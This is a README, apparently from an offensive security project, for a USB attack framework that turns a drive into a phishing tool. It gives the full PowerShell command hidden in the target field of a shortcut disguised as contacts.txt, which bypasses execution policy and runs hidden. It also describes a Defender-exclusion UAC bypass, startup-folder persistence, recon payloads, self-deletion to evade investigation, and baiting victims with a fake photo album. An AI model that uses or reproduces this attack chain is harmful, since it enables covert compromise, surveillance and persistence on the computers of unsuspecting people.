Table of Contents
An offensive security framework that weaponizes any standard USB Device
This framework is designed to be implemented on any standard USB Drive
This attack takes advantage of the ability to run powershell commands from inside a .lnk file.
The following video is another example of how this method may be implemented.
After downloading the .Zip file and placing the contents on your USB drive you'll want to delete the ReadMe.md and LICENSE file
Next you will want to make sure the h
directory and s1.bat
file have the hidden attribute. You do not want these files to be visible to your target.
Now in the Root directory you should have 3 files
- A hidden
h
directory - Folder containing all the files needed to be moved onto your targets system, and the initial script to be run - A hidden
s1.bat
file - A bat file called on by the shortcut to move all the above files and execute the initial script - A
contacts.txt
.lnk file (shortcut) - a shortcut phishing file disguised as a text file to entice your target to open it
The h
directory will contain 5 more files
contacts.txt
- the actual text file to be opened by the shortcut to convince your target they just opened a regular txt fileexception.ps1
- A script containing a UAC bypass to open an admin window and add the targets C:/ drive to the windows defender exclusion list. This will prevent further tools you download from being flagged by defenderintitial.ps1
- This is a script that will be ran one time when the target open the fake text filepersist.cmd
- This is a file added to the start up folder to achieve persistence. It will call on thepersist.ps1
file stored in the AppData directorypersist.ps1
- This is the file that will contain your script that will be run everytime the target boots up their computer
Taking advantage of a little known secret we will be running powershell code embedded in a shortcuts target field as seen in the image below.
This has a few advantages.
- You can't run a regular powershell script by double clicking on it. It will only open it with your default text editor. It will run from a shortcut
- External powershell scripts can not be run without triggering the UAC prompt. We use the shortcut to open their own powershell console we run it from to trick their sytem into thinking it is from a native script.
This is the code in that target text box:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')
This code will open a powershell console and bypass the execution policy and run our bat file after identifying what drive letter our USB is.
In order for it to find our drive we must change the label of our USB to match the label used in our code in the target text box.
For this example notice the label in the image below and the code above are both 259
. This can be changed but they both need to match.
Once you have all of the above set up you are ready to execute this attack vector
You will want to have 2 payloads ready.
-
Your initial payload to be run once this attack has been initiated.
I use my ADV Recon payload to gather as much info on my target as possible
-
The payload you want to be run with persistence at each reboot on your targets PC (This payload will vary depending on your goal)
Once this attack vector has been initiated by your target opening the fake text file link it will open the real hidden txt file in the h
directory to avoid suspicion
The shortcut will then run the s1.bat
file that will initialize the rest of your scripts.
First your initial payload will run followed by moving your persistance.bat
file to the start up directory.
Then your persistence.ps1
file will be added to the AppData folder and run once now and again at each start up.
Finally the real hidden text file will replace your fake txt shortcut link and delete the rest of the files to avoid further investigation into your USB drive
In a real world scenario you would also want to make the USB drive look realistic with a photo album or something else to entice your target to get in contact with you by clicking on the fake contacts.txt file
- An internet connection
- Windows 10,11
All contributors names will be listed here
I am Jakoby
- 0.1
- Initial Release